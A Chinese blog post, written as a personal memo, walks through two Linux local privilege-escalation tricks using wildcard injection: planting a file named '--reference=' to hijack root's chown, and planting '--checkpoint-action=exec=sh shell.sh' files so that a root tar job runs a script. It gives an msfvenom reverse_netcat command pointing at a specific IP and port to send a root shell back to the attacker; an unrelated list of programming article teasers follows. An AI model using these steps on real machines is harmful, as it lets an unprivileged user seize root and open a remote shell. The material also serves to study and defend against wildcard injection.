记录Linux下的钓鱼提权思路
参考Freebuf上的提权文章(利用通配符进行Linux本地提权):
http://www.freebuf.com/articles/system/176255.html
以两个例子的形式进行记录,作为备忘:
0x01 Chown的--reference特性
存在三个用户:root、yunsle和test,假设这样一个场景,root用户要将/home/test下所有的文件所有者设置为test,那么yunsle如何通过root的这样一个操作,达到攻击目的呢?
文件中目前内容如下:
攻击者yunsle在/home/test下创建两个文件,如下:
echo "">yunsle
echo > --reference=yunsle
此时root用户在当前目录下执行将所有文件拥有者设置为test的chown命令:
chown -R test:test *
虽然命令执行出现了报错,但是再查看文件,发现拥有者并没有修改为test,而是yunsle:
0x02 tar的命令执行:--checkpoint-action&--checkpoint
存在两个用户:root、yunsle,其中yunsle是非root组的攻击者,需要想办法提升权限,可以使用tar命令进行利用。
如果在cron计划中,root用户存在计划执行并且使用到了tar命令,或者攻击者提前知道root会对某个人文件执行tar,可以形成攻击场景。
攻击者首先自己可以生成一个反弹shell,如使用msfvenom:
msfvenom -p cmd/unix/reverse_netcat lhost=47.94.37.40 lport=7777 R
并且在接收机上监听7777端口:
将反弹shell内容在目标机上,写入shell.sh文件:
接下来再创建两个文件:
echo > "--checkpoint-action=exec=sh shell.sh"
echo > --checkpoint=1
此时,root对当前目录执行类似如下的tar操作:
tar -zcf bak.tgz /home/test/*
已经成功以root身份执行shell.sh,并且将shell反弹至攻击者服务器:
相关文章:
(C++)strlen(),strcmp(),strcpy(),strcat()用法
string.h中包含了许多用于字符数组的函数。使用前需要在程序开头加string.h©或cstring(C)头文件 strlen() 作用:得到字符数组第一个结束符\0前的字符的个数 #include<cstdio> #include<cstring>int main(){char str[50];gets(str);printf("…
springMvc+mybatis+spring 整合 包涵整合activiti 基于maven
2019独角兽企业重金招聘Python工程师标准>>> 最近自己独立弄一个activiti项目,写一下整合过程: 环境:jdk1.7 tomcat7.0 maven3.5 eclipse mysql5.5 --我的工程结构,怎么创建一个maven项目就不在这里写了: …
(原)Eclipse 字体过小问题
刚解压/安装的eclipse(或者myeclipse,sts等因为默认使用Consolas字体的原因,中文字会显得非常小 解决办法搜索网络无非两种:1.不想太麻烦去下字体的话,就将eclipse的字体改为Courier New,方法如下:A.进入eclipse配置,找到编辑字体的地方: window->perferences->General-&…
一个饼形图形报表
最近在做一个统计投票数量的图形报表,主要借鉴了一个51aspx中的一个例子,因为要在一页中显示多个图形,所以选择了在pannel中动态添加Image控件.效果图如下:/// <summary>/// 饼形图形报表/// </summary>/// <param name"target">Stream对象的实例&…
(C++)从字符串中取出整形、浮点型和字符串
目的:从字符串"330:20.20:yoyo"中取出整数330,浮点数20.20和字符串"yoyo" #include<cstdio> #include<cstring>int main(){char str[50]"330:20.20:yoyo";int n;double g;char sstr[40];sscanf(str,"%d…
[C#]网络编程系列专题二:HTTP协议详解
转自:http://www.cnblogs.com/zhili/archive/2012/08/18/2634475.html 我们在用Asp.net技术开发Web应用程序后,当用户在浏览器输入一个网址时就是再向服务器发送一个HTTP请求,此时就使用了应用层的HTTP协议,在上一个专题我们简单介…
Python3 与 C# 并发编程之~ Net篇
NetCore并发编程 示例代码:https://github.com/lotapp/BaseCode/tree/master/netcore/4_Concurrency 先简单说下概念(其实之前也有说,所以简说下): 并发:同时做多件事情多线程:并发的一种形式并…
tomcat5.5.9+sql2000数据库连接池配置
终于解决了困扰多天的连接池的问题,写下这编文章与大家一起分享。我是在tomcat5.5.9下配置的,tomcat5.5.X和以前的版本有一些差别,所以配置上也有差别。我就说一下在tomcat5.5.9配置的基本步骤:(确定你以安装好tomcat5…
(C++)第一个字母变成第26个字母,第i个字母变成第(26-i+1)个字母,非字母字符不变。要求根据密码译回原文,并输出。
题目描述 有一行电文,已按如下规律译成密码: A–>Z a–>z B–>Y b–>y C–>X c–>x … … 即第一个字母变成第26个字母,第i个字母变成第(26-i1)个字母,非字母字符不变。要求根据密码译回原文&a…
mysql++读写BLOB数据
mysql读写BLOB数据 1、使用sql_create_n宏函数,建立数据库表字段与对象。 #define sql_create_2(NAME, CMP, CONTR, T1, I1, T2, I2) \ sql_create_complete_2(NAME, CMP, CONTR, T1, I1, #I1, T2, I2, #I2) \ //NAME:表名࿱…
oracle RAC的VIP和scan
我们都知道Oracle RAC中每个节点都有一个虚拟IP,简称VIP,与公网IP在同一个网段。 没有VIP时,Oracle客户端是靠“TCP/IP协议栈超时”来判断服务器故障。而TCP/IP协议栈是作为OS Kernel的一部分来实现,不同的OS有不同的阀值…
2007年你必须学习的10项.NET技术
1、WCF (Windows Communication Foundation):虽然WCF显然没有WPF或SilverLight那么吸引人,但是它却是在.NET框架下解决业务问题的基础。所以你今年至少要学习一门.NET的新技术,那你就选择WCF吧。 2、ADO.NET (and LINQ):这是让你与数据层打交道的技术。并且LINQ提供了将各种数据…
(C++)用指针实现两数交换函数swap()的两种方法
#include<cstdio>//用指针写swap()函数 void swap_1(int* p1,int* p2){int temp *p1;*p1 *p2;*p2 temp; } //用指针和指针的引用写swap()函数 void swap_2(int* &p1,int* &p2){int* temp p1;p1 p2;p2 temp; } int main(){int a 2020,b2021;int *p1&a,…
【转】《iOS7 by Tutorials》系列:iOS7的设计精髓(上)
简介: 本文翻译自《iOS7 by Tutorials》一书的第一章“Designing for iOS 7”,主要从程序员角度介绍了iOS7的新设计理念,堪称神作!本文翻译仅作学习交流之用,版权归原作者所有,有删减。非专业翻译人士粗糙之…
有兴趣的执行一下这段代码
有兴趣的执行一下这段代码:staticpublicstringGetConfigiuageConnString() { Guid dataLinksGuid new Guid("2206cdb2-19c1-11d1-89e0-00c04fd7a829"); Type dataLinksType Type.GetTypeFromCLSID(dataLinksGuid, true); …
python爬虫知识点总结(二十三)Scrapy中Download Middleware的用法
待更新转载于:https://www.cnblogs.com/cthon/p/9424551.html
(C++)输入3个字符串,按从小到大的顺序输出。
#include<cstdio> #include<cstring> //1.利用指针编写两个字符串的比较函数 //2.利用二位字符数组接收3个字符串 //3.输出排序后的字符串 void s_to_b(char str1[10],char str2[10]){char temp[10];strcpy(temp,str1);strcpy(str1,str2);strcpy(str2,temp); }void…
Mysql备份还原数据库之mysqldump实例及参数详细说明
我们在运营项目的过程中肯定会遇到备份数据库,还原数据库的情况,我们一般用一下两种方式来处理: 1.使用into outfile 和 load data infile导入导出备份数据 这种方法的好处是,导出的数据可以自己规定格式,并且导出的是…
女性护理品牌Honeymate获8000万A+轮融资,将与美图公司深度合作
8月5日消息,女性护理品牌“美则Honeymate”于今年7月获美图公司8000万A轮战略融资,资金主要用于品牌扩张以及用户体系、会员体系的建立,也将与美图公司深度合作,为美图超5亿用户创造更多价值。 美则Honeymate(深圳市护…
桌面图标不透明的小问题处理
"我的电脑"--"属性"--"高级"--"设置",将下框"在桌面上为图标标签使用阴影"打勾. 在"自定义桌面"里去除相应"桌面网页"项.通过如上两步一般就可以去除图标后面的方框背景, 早上一来遇到位同事问我桌面图…
<论文翻译>RepVGG: Making VGG-style ConvNets Great Again
RepVGG:让VGG风格的卷积网络再一次伟大 文章目录RepVGG:让VGG风格的卷积网络再一次伟大摘要1. Introduction2. Related Work2.1 从单路径到多分支2.2 有效的单路径模型的训练2.3 模型重新参数化2.4 温诺格勒(Winograd)卷积3. 通过结构性重新参数化构建RepVGG3.1 简单就是快&…
关于android布局的两个属性dither和tileMode,background 平铺
http://blog.csdn.net/yuxiaohui78/article/details/8196043转载于:https://www.cnblogs.com/leihupqrst/p/3711725.html
volatile - 如何实现线程安全
2019独角兽企业重金招聘Python工程师标准>>> volatile关键字,在我之前的博客 Volatile - 用途 中已经简单讲解过,当时提出了volatile在多线程中是不安全的。本文将重点介绍一种使用方式,可以实现线程安全。 首先,来看一…
【我翻译的文章】你还需要数据层吗?
随着LINQ的临近发布,独立数据访问层的必要性需要重新进行评估了。它是否仍是应用程序设计的一个重要部分?或者它是否会变成一个过去的附属物? 详细信息请访问:http://www.infoq.com/cn/news/2007/08/DAL转载于:https://www.cnblog…
正则表达式最常用的符号匹配
字符描述\d代表任意数字,就是阿拉伯数字 0-9 这些玩意。\D大写的就是和小写的唱反调,\d 你代表的是任意数字是吧?那么我 \D 就代表不是数字的。\w跟 \w 唱反调,代表不是字母,不是数字,不是下划线的。\n代表…
一道多线程编程题
有意思的一道多线程编程题请用多线程显示,每三个数字为一组,直到30线程A:1线程A:2线程A:3线程B:4线程B:5线程B:6线程A:7线程A:8线程A:9public cla…
垃圾回收机制:
2019独角兽企业重金招聘Python工程师标准>>> 垃圾回收机制: 1、GC通过确定对象是否被活动对象引用来确定是否收集该对象。 2、触发GC的条件 1)GC在优先级最低的线程中运行,一般在应用程序空闲即没有应用线程在运行时被调用。但下面的条件例外…
爬虫入门知识笔记
1.爬虫是什么 定义一: 网络爬虫(又被称为网页蜘蛛,网络机器人)就是模拟浏览器发送网络请求,接收请求响应,一种按照一定的规则,自动地抓取互联网信息的程序。原则上,只要是浏览器(客户端)能做的事…
SQL SERVER中什么情况会导致索引查找变成索引扫描
原文:SQL SERVER中什么情况会导致索引查找变成索引扫描SQL Server 中什么情况会导致其执行计划从索引查找(Index Seek)变成索引扫描(Index Scan)呢? 下面从几个方面结合上下文具体场景做了下测试、总结、归纳。 1&…
wait跟sleep的区别
区别 wait sleep 线程 自动唤醒 object的方法只要 线程碰到wait就要等 待不能指定哪个线程等待 Thread的方法 wait用于同步 在任何地方使用 自动释放锁 不会释放锁 转载于:https://www.cnblogs.com/-try/p/3714954.html